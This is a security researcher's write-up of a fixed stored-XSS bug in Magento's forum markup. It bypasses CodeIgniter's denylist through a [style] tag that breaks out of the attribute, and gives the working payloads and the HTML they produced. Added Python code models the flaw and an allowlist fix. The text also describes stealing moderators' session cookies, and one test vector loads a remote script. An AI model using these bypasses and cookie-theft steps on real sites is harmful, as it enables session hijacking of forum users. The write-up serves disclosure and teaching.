
Stylish XSS in Magento: When `style` helps you

How to bypass CodeIgniter in a Real World Setting?

by
Ashar Javed
https://twitter.com/soaj1664ashar
Normally I do not write about XSS findings in the form of a write-up (I always prefer a tweet) unless
it is interesting (e.g., http://www.scribd.com/doc/211362856/Stored-XSS-in-Twitter-Translation),
funny (e.g., http://issuu.com/msasharjaved/docs/urlwriteup) or worth sharing (e.g.,
http://www.scribd.com/doc/210121412/XSS-is-not-going-anywhere). This XSS in Magento is
interesting, funny and worth sharing. Further, this XSS is not about alert or money. It is about
passion and love. Furthermore, this story shows you how to bypass "CodeIgniter", one of the
most popular PHP-based web application frameworks, in a real world setting; or, if you like, this is a real world
CTF. Some of my XSS findings are available in the presentation (http://slid.es/msasharjaved/cross-site-scripting-my-love)
that I gave at RSA Europe 2013 as a part of the OWASP Seminar. Make
sure to press the downward arrow for each XSS example's explanation.
Magento Commerce (https://www.magentocommerce.com), an eBay Inc. company, is one of the
leading providers of ecommerce-based solutions. Magento had announced a bug bounty program
(http://magento.com/security) a few months ago. Magento allows the following set of mark-ups (shown
in the figure given below) if you wish to post a question on the forums
(http://www.magentocommerce.com/boards/newtopic/), wish to reply to someone's post
(http://www.magentocommerce.com/boards/newreply/), or want to send a private message to members
of the forums (http://www.magentocommerce.com/boards/member/messages/pm/); the feature is also
available as a part of the forum signature
(https://www.magentocommerce.com/products/customer/account/editsignature/). Magento is also
using this mark-up feature on its subdomains like http://enterprise.magento.com/ and
http://go.magento.com/. In short, this feature is everywhere on the site.
Magento's mark-up (rich text / WYSIWYG) feature is pretty restricted and only allows a few
harmless tags, i.e., bold, italic, underline, quote, code, mailto and the anchor tag. At the same time, a user
can also set "size" and "color" properties of the above mentioned tags, as a part of a style attribute.
Now let's describe how these tags work in a normal manner. The following inputs (left column of the
figure in the original) result in the corresponding HTML:

[b][size=4][color=blue]bold[/size][/color][/b]
[i]italic[/i]
[u]underline[/u]
[quote]quote[/quote]
[code]code[/code]
[email=justashar@hotmail.com]reach me[/email]
[url=http://www.bbcnews.com]Top Stories[/url]

Let's break the first input down into parts, e.g., [b][size=4][color=blue]bold[/size][/color][/b] is
internally treated as:

<b><span style="font-size:16px;"><span style="color:blue;">bold</span></span></b>
Quick Test
-------------
As a part of a quick test, I initially tried the most common XSS vector, i.e.,

"><img src=x onerror=prompt(1);>

and the site converted this attack vector into:

>xonerror=prompt(1);
AND as a part of a second try, I used the following XSS vector (I wanted to see HTMLi, because it
seemed XSS was not working):

'">><marquee><img src=x onerror=confirm(document.cookie)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>alert(document.domain)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="http://www.ieee-security.org/images/new-web/Trojan_Horse.jpg"onmouseover=eval(id&#x29;>'"><img src="http://bryanhallsawakening.files.wordpress.com/2013/09/anonymousbigbrotherclone.jpg"/ onmousover=alert(1)><script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

and it has been converted into:

>><marquee>x onerror=confirm([removed])<marquee>"><plaintext\><\"><plaintextonmouseover=prompt(1)>">alert(document.domain)@gmail.com<isindex formaction=[removed]alert(/XSS/) type=submit>'-- >">alert(1)"><imgid="confirm(1)"alt=""src="http://www.ieee-security.org/images/new-web/Trojan_Horse.jpg"onmouseover=eval(id)>>http://bryanhallsawakening.files.wordpress.com/2013/09/anonymousbigbrotherclone.jpg
In short, the above vector also does not work, but if you notice the underlined stuff (i.e., [removed])
in the converted vector, it shows that the site is using CodeIgniter, a popular PHP-based web
application framework. If you ever wondered how CodeIgniter works for XSS mitigation, I would like to
refer you to https://github.com/EllisLab/CodeIgniter/blob/develop/system/core/Security.php#L128.
As part of CodeIgniter's feature, it simply looks for some black-listed words like
"document.cookie", "javascript" etc. and then changes these words into [removed]; the goal
is to mitigate the effect of JavaScript. Note that this is a denylist: it rewrites known-bad spellings
instead of encoding the data for the context it is output into, so any spelling the list does not
contain passes straight through. If you would like to see what I already did with CodeIgniter
(bypassed several times), please see https://github.com/EllisLab/CodeIgniter/issues/2667. Rafay
(https://twitter.com/rafaybaloch) and Mathias (https://twitter.com/avlidienbrunn) also participated in
this bug report and found bypasses.
The summary so far: the most commonly used XSS attack vector and the vector that I often use
do not work ... At this point, I am pretty sure most of the respected bug bounty hunters and
f**king automation tools stop here and start looking for other low hanging fruits
:) This XSS is out of scope for any automation tool out there.
But for me it "Sounds Challenging", so
More Testing
---------------
Let's try "onmouseover" or "onmousemove" etc. in the allowed mark-ups and see what
happens, e.g.,

[b/onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]

AND/OR

[b onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]

Both of the above variations also do not work (the original write-up shows screenshots of how the site
treats them internally and of the rendered output).
If you remember, one of the allowed mark-ups is an anchor, i.e., the <a> tag (i.e.,
[url=http://www.bbcnews.com]Top Stories[/url]). The immediate thought that came to my mind was: I
should try XSS via javascript: (i.e., javascript:alert(1)) and/or a data URI (i.e.,
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+, which is <svg/onload=alert(1)> in base64) ...
Let's input ...

[url=javascript:alert(1)]Top Stories[/url]

AND/OR

[url=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+]Top Stories[/url]

The above two forms of injection also do not work (screenshot in the original). If you look
closely at that figure, you will see http:// has been prepended before the javascript: and
data: URIs ... which makes them USELESS. At the same time, again CodeIgniter comes into action
and converts the word "javascript" into the string "[removed]" in the first variation.
The next thing I tried is:

[url=ja&Tab;vas&Tab;cript:alert&lpar;1&rpar;]Top Stories[/url]

and the sole purpose is to defeat CodeIgniter's black-listed term "javascript" with the help of
HTML5 named entities (a browser decodes &Tab; in the attribute value and then strips the tab while
parsing the URL, so ja&Tab;vas&Tab;cript: would become javascript: if it survived). But Magento
converts the above injection into the following (& is converted into its respective entity, i.e., &amp;):

<a href="http://ja&amp;Tabvas&amp;Tabcript:alert&amp;lpar1&amp;rpar" target="_blank">Top Stories</a>
At this point of time, I am in need of a "cup of tea", so "Tea Time" :-)
As soon as I finished the "cup of tea", an immediate thought came to my mind that I should try XSS
via the "style" attribute (that's why Stylish XSS :)). Please keep in mind the above mentioned
procedure of setting a "style" on allowed mark-ups. The following input

[b][size=4][color=blue]bold[/size][/color][/b]

is treated internally as:

<b><span style="font-size:16px;"><span style="color:blue;">bold</span></span></b>

It means that if we specify a size or color, the site dynamically generates a <span> tag along with a "style"
attribute and assigns the mentioned size and the given color to it.
The initial goal I had in my mind was to execute JavaScript via CSS expressions, i.e.,
x:expression(alert(1)) or width:expression(alert(1)). JavaScript execution via CSS
expressions (in old IE browsers: IE7 and earlier, and IE8 outside standards mode) has been known for
ages and has already been discussed at
http://sla.ckers.org/forum/index.php and
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
So as a part of the next step, I tried ...

[b][size=4][color=width:expression(alert(1))]bold[/size][/color][/b]

which becomes (screenshot in the original):
Again CodeIgniter comes into action (see figure above) and has removed the black-listed word, i.e.,
"expression". In order to defeat the black-listed word "expression", a known technique has also been
discussed at http://sla.ckers.org/forum/index.php, and the technique is "expre/**/ssion", i.e., the use of a
multi-line comment inside the word "expression": IE7's CSS parser simply ignores /**/ and JavaScript via the
CSS expression gets executed. So let's change the vector to use "expre/**/ssion":

[b][size=4][color=width:expre/**/ssion(alert(1))]bold[/size][/color][/b]

So it seems, with the help of /**/, the above injection bypasses CodeIgniter's black-listed word
"expression" and it looks like this (screenshot in the original):
BUT still JavaScript does not get executed in IE7, and the reason is the "color" CSS property. In CSS,
the standard way to assign a value to a property is:

CSSPropertyName: Value

In the above case (see figure above), the browser considers "width" as the value of the "color" property, which
is basically nothing (color:width:expre/**/ssion(...) is an invalid declaration and is dropped), and
"width:expre/**/ssion" never gets executed. The following is the screen-shot
of the source code in the IE7 browser (screenshot in the original):
The problem in hand is HOW TO GET RID OF the "color" property so that I can use
"width:expre/**/ssion(alert(1))" (width as the property name and the expression as its value). The site's
user-interface only allows "color" and "size" properties. One more thing that you may have noticed
in the above screen-shot is that alert(1) becomes alert&#40;1&#41;. This shows CodeIgniter again
comes into action :)
CodeIgniter converts the black-listed keyword "alert(1)", if found in input, but this time instead of
using "[removed]", CodeIgniter only converts ( and ) into their respective decimal entities. I think
this is an implementation flaw of CodeIgniter, because even if ( and ) are converted into decimal
entities, they will still work once the payload lands in an attribute value such as style or an event
handler: the HTML parser decodes the entities before the CSS or JavaScript engine ever sees them
(later you will see a screen-shot) ... OR as an
alternate way or proof of concept, you can simply use "confirm" or "prompt" ...
In a real life attack scenario, an attacker does not need alert, confirm or prompt ... :-)
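To make the two CodeIgniter behaviours described above concrete (the [removed] substitutions from the denylist, and the alert(1) to alert&#40;1&#41; rewrite), here is an added example. It is my own code, not CodeIgniter's and not from the original write-up: a simplified model of the denylist in system/core/Security.php, run over the inputs used in this write-up, followed by what the browser hands to the CSS or JavaScript engine after it decodes the entities in an attribute value, and, beside it, an allowlist-based renderer for the [size]/[color] markup that never builds a style value from user text. The rules are a subset of the real ones; the colour list and the accepted pixel range are my assumptions.

```python
import html
import re

# --- vulnerable side: a denylist modelled on CodeIgniter's xss_clean() ---
# Substring rules: every occurrence becomes the literal "[removed]".
NEVER_ALLOWED_STR = {
    "document.cookie": "[removed]",
    "document.write": "[removed]",
    "window.location": "[removed]",
    "-moz-binding": "[removed]",
}
# Regex rules, applied case-insensitively.
NEVER_ALLOWED_REGEX = [
    r"javascript\s*:",
    r"expression\s*(\(|&\#40;)",
    r"vbscript\s*:",
]
# Call neutralisation: alert(1) -> alert&#40;1&#41;. "confirm" and "prompt" are
# not in this list, which is why the write-up falls back to them.
NAUGHTY_CALLS = re.compile(
    r"(alert|cmd|passthru|eval|exec|expression|system|fopen|fsockopen|file|"
    r"file_get_contents|readfile|unlink)(\s*)\((.*?)\)",
    re.I | re.S,
)


def denylist_clean(s: str) -> str:
    """CodeIgniter-style cleaning: rewrite known-bad spellings, encode parens."""
    for bad, repl in NEVER_ALLOWED_STR.items():
        s = s.replace(bad, repl)
    for pattern in NEVER_ALLOWED_REGEX:
        s = re.sub(pattern, "[removed]", s, flags=re.I | re.S)
    return NAUGHTY_CALLS.sub(r"\1\2&#40;\3&#41;", s)


def as_seen_by_engine(cleaned: str) -> str:
    """What the CSS or JavaScript engine receives once the cleaned value sits
    in an HTML attribute: the HTML parser decodes character references first,
    so &#40; and &#41; are plain parentheses again."""
    return html.unescape(cleaned)


# --- hardened side: allowlist the two properties the markup is meant to set ---
NAMED_COLORS = {"black", "white", "red", "green", "blue", "gray", "orange"}  # assumed
HEX_COLOR = re.compile(r"\A#(?:[0-9a-f]{3}|[0-9a-f]{6})\Z", re.I)


def render_styled(text: str, color: str = None, size: int = None) -> str:
    """Render [size]/[color] markup from validated pieces only. The style
    value is assembled from a fixed colour and an integer pixel size; user
    text never reaches the style attribute, and everything is attribute-
    encoded on output."""
    decls = []
    if color is not None:
        if color.lower() not in NAMED_COLORS and not HEX_COLOR.match(color):
            raise ValueError("rejected color value: %r" % color)
        decls.append("color:%s" % color.lower())
    if size is not None:
        if not isinstance(size, int) or not 8 <= size <= 40:  # assumed px range
            raise ValueError("rejected size value: %r" % size)
        decls.append("font-size:%dpx" % size)
    style = html.escape(";".join(decls), quote=True)
    return '<b><span style="%s">%s</span></b>' % (style, html.escape(text))


def is_rejected(color=None, size=None) -> bool:
    """True when the allowlist renderer refuses the given markup values."""
    try:
        render_styled("bold", color=color, size=size)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for payload in ("alert(document.cookie)", "alert(cookie)",
                    "width:expression(alert(1))",
                    "width:expre/**/ssion(alert(1))", "javascript:alert(1)"):
        cleaned = denylist_clean(payload)
        print("%-34s -> %-40s engine sees: %s"
              % (payload, cleaned, as_seen_by_engine(cleaned)))
    print(render_styled("bold", "blue", 16))
    print("bypass rejected:", is_rejected(color="width:expre/**/ssion(alert(1))"))
```

The denylist turns `alert(cookie)` into `alert&#40;cookie&#41;` and `expre/**/ssion` is left alone entirely; once either value is placed inside a style or event-handler attribute the browser decodes the entities and the engine sees exactly the original payload. The allowlist renderer does not try to recognise bad input at all: it only ever emits a colour it knows and a number, so there is nothing for a comment trick or an entity to bypass.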
At this time, a weird idea comes to my mind and the idea is: WHAT WILL HAPPEN IF I USE A
"STYLE" TAG, i.e., [style]...[/style] (in the allowed mark-up syntax)? The reason is: the site is
allowing a style attribute; maybe it will allow a style tag also, or maybe the developers made a
mistake in the implementation and do not differentiate between the style attribute and a style tag :-)
So I decided to input the following:

[b][style=width:expre/**/ssion(alert(1))]bold[/style][/b]

and it becomes:

<span class="width:expre/**/ssion(alert(1))">bold</span>

It means that this time, Magento has generated a <span> tag but without a "style" attribute. Instead
of dynamically generating the "style" attribute, Magento has created a "class" attribute. One thing
we already know: the "style" attribute is allowed, but previously it worked only with the "size" and "color"
properties.
As a part of the next step, what will happen if I use the "style" tag (i.e., [style][/style]) along with a
"style" attribute?
Now our above injection becomes:

[b][style=style=width:expre/**/ssion(alert(1))]bold[/style][/b]

and the site converts the above injection into:

<span class="style=width:expre/**/ssion(alert(1))">bold</span>

Unfortunately this again does not work because the browser treats style=width:expre/**/ssion(alert(1))
as the value of the "class" attribute, BUT the good thing is that I had now GOT RID OF the "color" property
and the only thing left is TO BREAK OUT OF THE ATTRIBUTE CONTEXT, i.e., in this case the
"class" attribute.
Now we only need DOUBLE QUOTES, at first sight ... :-)
So the new injection now looks like:

[b][style="style=width:expre/**/ssion(alert(1))]bold[/style][/b]

and this time, Magento has converted the above injection into:

<span class="" style="width:expre/**/ssion(alert(1))&quot;">bold</span>

Though we have jumped out of the attribute context, we still need the value of the "style"
attribute to look like style="width:expre/**/ssion(alert(1))" in order to get JavaScript executed
via CSS expressions.
If you look closely, the site automatically inserts a closing " (double quote) in order to properly
close the attribute value. The output is exactly what a parser that re-serialises attributes produces:
the site drops our value into class="...", re-parses the tag, and emits every attribute with its own pair
of quotes. Our leading " closes class="" early, style= becomes a second, unquoted attribute, and the
template's own trailing " is swallowed into that unquoted value and comes back out as &quot;. To
terminate the unquoted value ourselves we only need a space followed by some junk, which then becomes
a harmless third attribute.
Finally our injection is:

[b][style="style=width:expre/**/ssion(alert(1)) junktext]bold[/style][/b]

and this time Magento behaves like a good child:

<span class="" style="width:expre/**/ssion(alert(1))" junktext"="">bold</span>
So now all is set for an XSS in IE7 ...
But after the XSS, the following questions came to my mind ...
IS IT ENOUGH TO HAVE AN XSS THAT ONLY WORKS IN IE7?
WHO CARES ABOUT AN XSS THAT WILL ONLY WORK IN IE7?
CAN I CONVERT THIS XSS INTO AN XSS THAT WORKS IN A MODERN BROWSER?
Let's Do It
If you remember correctly, as soon as we injected the [style][/style] mark-up, Magento
dynamically created a "class" attribute, e.g.,

[b][style=]bold[/style][/b]

has been converted into:

<span class="">bold</span>

It means that now we can try the "onmouseover" stuff along with the "style" tag and this should work ...
So our FINAL injection that works in the latest Chrome browser will now look like:

[b][style="onmouseover="alert(cookie);]bold[/style][/b]

The first " breaks out of the attribute context while the second " holds alert(cookie) in the
following manner: "alert(cookie)". The above injection has been converted into ...

<span class="" onmouseover="alert(cookie);">bold</span>

Here is the screen-shot of the code in Chrome (screenshot in the original):

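The three converted outputs above (the one ending in &quot;, the junktext one, and the onmouseover one) all fall out of a single mechanism: the site drops the [style=...] value into class="..." and then re-parses and re-serialises the start tag attribute by attribute. Here is an added example, my own code and not Magento's, that implements the relevant HTML5 tokenizer states for attributes, reproduces all three outputs from the injections used in this write-up, and puts the encode-on-insertion variant beside it. That the site serialises attributes this way is my inference from the outputs shown, not something the write-up states.

```python
import html


def parse_attrs(tag_body: str):
    """Split the text after a tag name into (name, value) pairs the way the
    HTML5 tokenizer does: a name ends at whitespace, '/', '=' or '>'; a quoted
    value ends at the matching quote (or end of input); an unquoted value ends
    at whitespace or '>'. A '"' inside a name or an unquoted value is kept as
    an ordinary character, exactly as a browser keeps it."""
    attrs, i, n = [], 0, len(tag_body)
    while i < n:
        while i < n and tag_body[i] in " \t\n/":            # before attribute name
            i += 1
        if i >= n or tag_body[i] == ">":
            break
        j = i
        while j < n and tag_body[j] not in " \t\n/=>":      # attribute name
            j += 1
        if j == i:                                           # a bare '=' starts a name
            j = i + 1
        name, i = tag_body[i:j].lower(), j
        while i < n and tag_body[i] in " \t\n":             # after attribute name
            i += 1
        value = ""
        if i < n and tag_body[i] == "=":
            i += 1
            while i < n and tag_body[i] in " \t\n":         # before attribute value
                i += 1
            if i < n and tag_body[i] in "\"'":              # quoted value
                q = tag_body[i]
                j = tag_body.find(q, i + 1)
                j = n if j == -1 else j
                value, i = tag_body[i + 1:j], j + 1
            else:                                            # unquoted value
                j = i
                while j < n and tag_body[j] not in " \t\n>":
                    j += 1
                value, i = tag_body[i:j], j
        attrs.append((name, value))
    return attrs


def serialise(attrs) -> str:
    """Re-emit every attribute as name="value" with '&' and '"' escaped."""
    return " ".join('%s="%s"' % (name, html.escape(value, quote=True))
                    for name, value in attrs)


def site_render(markup_value: str) -> str:
    """Assumed Magento behaviour (inferred from the write-up's outputs): the
    [style=...] value is dropped raw into class="...", then the start tag is
    normalised by re-parsing and re-serialising its attributes."""
    attrs = parse_attrs('class="%s"' % markup_value)
    return "<span %s>bold</span>" % serialise(attrs)


def safe_render(markup_value: str) -> str:
    """Same template, but the value is attribute-encoded before insertion, so
    a user-supplied '"' can never terminate the class attribute."""
    return '<span class="%s">bold</span>' % html.escape(markup_value, quote=True)


def attribute_names(rendered_span: str):
    """Attribute names a browser would see on the rendered <span ...> tag."""
    body = rendered_span[len("<span "):rendered_span.index(">bold")]
    return [name for name, _ in parse_attrs(body)]


if __name__ == "__main__":
    for value in ('"style=width:expre/**/ssion(alert(1))',
                  '"style=width:expre/**/ssion(alert(1)) junktext',
                  '"onmouseover="alert(cookie);'):
        print(site_render(value), attribute_names(site_render(value)))
        print(safe_render(value), attribute_names(safe_render(value)))
```

Run it and the vulnerable renderer yields the three strings seen on the page, with `style` and `onmouseover` as separate attributes; the encoding renderer yields one `class` attribute whose value merely contains `&quot;`. The fix is not to hunt for quotes in input but to encode at the point where untrusted text meets the attribute, and, for something like a class name, to accept only values from a known list.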
One thing you may have noticed is that I have used "cookie" instead of "document.cookie". The
reason is CodeIgniter, because it removes "document.cookie" if found in the input string ...
BUT WHO NEEDS "document.cookie" when one can use "cookie"? An inline event handler is compiled
with the element and the document on its scope chain, so the bare identifier cookie resolves to
document.cookie. And on the following URL you will find 20 plus unique ways of accessing a cookie ...
http://pastie.org/private/nkryfy49l1oy8hvblh90q
If you use "document.cookie", then the injection looks like the following and does not work (screenshot in the original):
Now it's time to see the XSS in the latest Chrome and another cup of tea ... :-)
Another thing I noticed is that the "PHPSESSID" cookie is not HttpOnly.
It means an attacker can easily steal the session cookie of FORUM MODERATORS or a Magento
team member by simply sending a PRIVATE MESSAGE (with HttpOnly set, the injected script could still act as
the moderator from inside the page, but it could not simply read and exfiltrate the session). In order to see who is moderating the
forums, on the following URL: http://www.magentocommerce.com/boards/, if you scroll down
the page, it shows a list of active members and the usernames of moderators are
highlighted, e.g.,
http://www.magentocommerce.com/boards/member/382896/
http://www.magentocommerce.com/boards/member/163318/
http://www.magentocommerce.com/boards/member/139907/
This type of attack (i.e., stealing session cookies via XSS on forums) has already been used
successfully in the case of Ubuntu Forums (http://blog.canonical.com/2013/07/30/ubuntu-forums-are-back-up-and-a-post-mortem/)
and Apple developer forums
(http://mytechblog.com/other/apple/apple-developer-website-hacked-what-happened/) ...
This XSS has been fixed and it took Magento three and a half months for the fix. As a part of an
exercise you guys may try to break the fix :) Please let me know your feedback on this ...
Luckily one can still see this XSS live here (the old post is still there and they forgot to delete it):
http://www.magentocommerce.com/boards/viewthread/877566/ Once you open this URL,
please "Do not bring your mouse over the word bold" ;-)
